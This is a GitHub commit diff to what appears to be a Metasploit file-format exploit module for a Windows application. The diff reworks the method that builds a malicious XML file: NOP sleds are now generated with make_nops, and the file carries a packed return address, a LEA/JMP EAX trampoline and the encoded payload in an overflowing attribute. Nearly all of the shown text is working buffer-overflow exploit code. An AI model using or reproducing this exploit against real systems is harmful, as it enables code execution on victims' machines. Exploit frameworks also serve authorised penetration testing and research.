File tree Expand file tree Collapse file tree 1 file changed +7
-5
lines changed
modules/exploits/windows/fileformat Expand file tree Collapse file tree 1 file changed +7
-5
lines changed Original file line number Diff line number Diff line change @@ -51,18 +51,20 @@ def initialize(info = {})
5151 end
5252
5353 def exploit
54+ nops = make_nops ( 1000 ) *5
55+
5456 esp = "\x8D \x44 \x24 \x4C " # LEA EAX, [ESP+76]
55- jmp = "\xFF \xE0 " # JMP ESP
57+ jmp = "\xFF \xE0 " # JMP EAX
5658
5759 buffer = "<?xml version=\" 1.0\" encoding=\" UTF-8\" ?>\n <classify\n name=\' "
58- buffer << " \x90 " * 1560
60+ buffer << nops [ 0 , 1560 ]
5961 buffer << [ target . ret ] . pack ( 'V' )
60- buffer << " \x90 " * 16
62+ buffer << nops [ 0 , 16 ]
6163 buffer << esp
6264 buffer << jmp
63- buffer << " \x90 " * 70
65+ buffer << nops [ 0 , 70 ]
6466 buffer << payload . encoded
65- buffer << " \x90 " * 5000
67+ buffer << nops
6668 buffer << "\n </classify>"
6769
6870 print_status ( "Creating '#{ datastore [ 'FILENAME' ] } )
You can’t perform that action at this time.
0 commit comments